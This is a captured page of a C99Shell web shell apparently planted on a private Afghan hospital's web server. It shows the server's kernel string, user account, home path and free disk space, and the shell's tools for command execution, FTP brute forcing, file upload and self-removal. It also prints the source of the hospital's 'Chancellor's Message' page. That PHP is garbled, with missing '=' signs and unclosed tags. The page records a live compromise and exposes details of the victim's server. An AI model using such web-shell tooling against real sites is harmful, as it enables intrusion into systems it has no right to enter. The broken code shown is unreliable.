!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/home/katebhospital/public_html/   drwxr-x---
Free 984.22 GB of 3519.75 GB (27.96%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Chancellor_Message.php (5.86 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php 
include('admin/conn.php');
$settings mysqli_query($con,"SELECT * FROM settings");
$setting  mysqli_fetch_array($settings);
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="keywords" content="Site keywords here">
    <meta name="description" content="#">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title><?php echo $setting['site_name'?></title>
    <link rel="icon" href="assets/img/favicon.png">
    <link href="https://fonts.googleapis.com/css2?family=Barlow:ital,wght@0,400;0,500;0,600;0,700;0,900;1,500;1,700&amp;display=swap" rel="stylesheet">
    <link rel="stylesheet" href="assets/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/css/cube-portfolio.min.css">
    <link rel="stylesheet" href="assets/css/owl.carousel.min.css">
    <link rel="stylesheet" href="assets/css/slicknav.min.css">
    <link rel="stylesheet" href="assets/css/maginific-popup.min.css">
    <link rel="stylesheet" href="assets/css/animate.min.css">
    <link rel="stylesheet" href="assets/css/nice-select.css">
    <link rel="stylesheet" href="assets/css/datepicker.css">
    <link rel="stylesheet" href="assets/css/fontawesome.min.css">
    <link rel="stylesheet" href="assets/css/icofont.css">
    <link rel="stylesheet" href="assets/css/default.css">
    <link rel="stylesheet" href="assets/css/style.css">
    <link rel="stylesheet" href="assets/css/responsive.css">
</head>

<body>
    <?php require_once('header.php'?>
    <section class="breadcrumbs" style="background-image:url(assets/img/2.png)">
        <div class="container">
            <div class="row">

                <div class="col-lg-6 offset-lg-3 col-12">
                    <div class="breadcrumb-content">
                        <h4>Chancellor’s Message</h4>
                        <ul class="breadcrumb-menu">
                            <li><a href="index">Home</a><i class="far fa-angle-double-right"></i></li>
                            <li><a href="#">Chancellor’s Message</a></li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <section class="service-details-area">
        <div class="container">
            <div class="row">
                <div class="col-lg-4 col-md-7 col-12 wow fadeInUp" data-wow-delay="0.2s">
                    <div class="service-details-sidebar">
                        <div class="sidebar-service">
                        <?php include('sidebar-service.php'?>
                        </div>
                    </div>
                </div>
                <div class="col-lg-8 col-12 wow fadeInUp" data-wow-delay="0.2s">
                    <div class="service-details-inner">
                        <div class="service-details-content">
                            <div class="service-d-description">
                                <div class="service-d-top-img">
                                <img src="assets/img/DSC05752.JPG" alt="#">
                                </div>
                                <h3>Chancellor’s Message </h3>
                                <p>
                               Honorable country men! <br>
As you are in the picture, the health care system of Afghanistan faces many problems; more than half of the population of Afghanistan, in other words more than 18 million Afghans, do not have access to basic health care facilities. And malnutrition has reached to a new peak. And more than 7 million mothers and children, under 7, face malnutrition. In addition to this, malnutrition is very high in 28 provinces out of 34 provinces. It is not to mention, shortage of health care facilities and international aid is one of the other tough problems the health care of Afghanistan faces today. Further, many health care experts left the country due to the new political developments in Afghanistan that exacerbated the challenges in the health sector. <br>
However, the health sector of Afghanistan, and especially the private sector which provides more than 65 percent of health care service in country has managed to continue provision of health care service in such a difficult situation in Afghanistan. <br>
Kateb as a private hospital, strives to provide quality health care facilities and improve them to provide high quality service to its clients and fulfil its responsivity to the people of Afghanistan. <br>
At the end, we wish goo health for everyone and pray for the patients. 

                               </p>
                            </div>
                           
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
<?php include('footer.php'?>
    <script data-cfasync="false" src="../cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>
    <script src="assets/js/jquery-3.6.0.min.js"></script>
    <script src="assets/js/bootstrap.bundle.min.js"></script>
    <script src="assets/js/bootstrap-datepicker.js"></script>
    <script src="assets/js/modernizer.min.js"></script>
    <script src="assets/js/magnific-popup.min.js"></script>
    <script src="assets/js/waypoints.min.js"></script>
    <script src="assets/js/jquery.counterup.min.js"></script>
    <script src="assets/js/owl.carousel.min.js"></script>
    <script src="assets/js/cube-portfolio.min.js"></script>
    <script src="assets/js/nice-select.min.js"></script>
    <script src="assets/js/wow.min.js"></script>
    <script src="assets/js/jquery.slicknav.min.js"></script>
    <script src="assets/js/steller.min.js"></script>
    <script src="assets/js/easing.min.js"></script>
    <script src="assets/js/jquery.scrollUp.min.js"></script>
    <script src="assets/js/main.js"></script>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0039 ]--